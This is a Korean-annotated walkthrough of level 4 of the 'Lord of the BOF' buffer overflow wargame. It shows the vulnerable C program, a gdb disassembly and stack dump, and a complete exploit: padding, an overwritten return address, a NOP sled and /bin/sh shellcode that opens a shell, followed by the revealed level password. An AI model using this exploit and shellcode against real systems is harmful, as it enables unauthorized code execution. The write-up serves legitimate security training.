04.lob goblin->orc

[goblin@localhost goblin]$ cat orc.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orc
        - egghunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter 환경변수 메모리 부분을 0으로 초기화 시킨다.. 한마디로 막혔다.
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf') //메모리 시작주소는 0xbf를 사용하라는 코드인데 스택 영역을 사용하라는 말이다. 
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        strcpy(buffer, argv[1]); //문자열 길이를 체크하지 않는다.
        printf("%s\n", buffer);
}

[goblin@localhost goblin]$ gdb ./orc1
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:       push   %ebp
0x8048501 <main+1>:     mov    %ebp,%esp
0x8048503 <main+3>:     sub    %esp,44
0x8048506 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804850a <main+10>:    jg     0x8048523 <main+35>
0x804850c <main+12>:    push   0x8048630
0x8048511 <main+17>:    call   0x8048410 <printf>
                        

(중간 생략)

0x80485ae <main+174>:   mov    %esi,%esi
0x80485b0 <main+176>:   mov    %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>:   add    %eax,4
0x80485b6 <main+182>:   mov    %edx,DWORD PTR [%eax]
0x80485b8 <main+184>:   push   %edx
---Type <return> to continue, or q <return> to quit---
0x80485b9 <main+185>:   lea    %eax,[%ebp-40]
0x80485bc <main+188>:   push   %eax
0x80485bd <main+189>:   call   0x8048440 <strcpy>
0x80485c2 <main+194>:   add    %esp,8
0x80485c5 <main+197>:   lea    %eax,[%ebp-40]
0x80485c8 <main+200>:   push   %eax  //<--strcpy후에 스택을 보기위해 브레이크포인트를 거는 지점
0x80485c9 <main+201>:   push   0x8048659
0x80485ce <main+206>:   call   0x8048410 <printf>
0x80485d3 <main+211>:   add    %esp,8
0x80485d6 <main+214>:   leave
0x80485d7 <main+215>:   ret
0x80485d8 <main+216>:   nop
0x80485d9 <main+217>:   nop
End of assembler dump.

(gdb) b*main+200
Breakpoint 1 at 0x80485c8
(gdb) r `python -c 'print "\xbf"*48'`
Starting program: /home/goblin/./orc1 `python -c 'print "\xbf"*48'`

Breakpoint 1, 0x80485c8 in main ()
(gdb) x/100x $esp
0xbffffabc:     0x00000015      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffacc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffadc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffaec:     0xbfbfbfbf      0x00000000      0xbffffb34      0xbffffb40 //<--0xbffffaec에 ret값이 들어가는데 그값을 nop주소로 바꾼다.
0xbffffafc:     0x40013868      0x00000002      0x08048450      0x00000000

nop를 넉넉히 넣어주고 리턴주소를 nop중간으로 뛰게 설정해준다.

버퍼(40)+sfp(4)+ret(4)+nop(200)+쉘코드

[goblin@localhost goblin]$ ./orc `python -c 'print "A"*44+"\x88\xfb\xff\xbf"+"\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
                                     ̀
bash$ whoami
orc
bash$ my-pass
euid = 504
cantata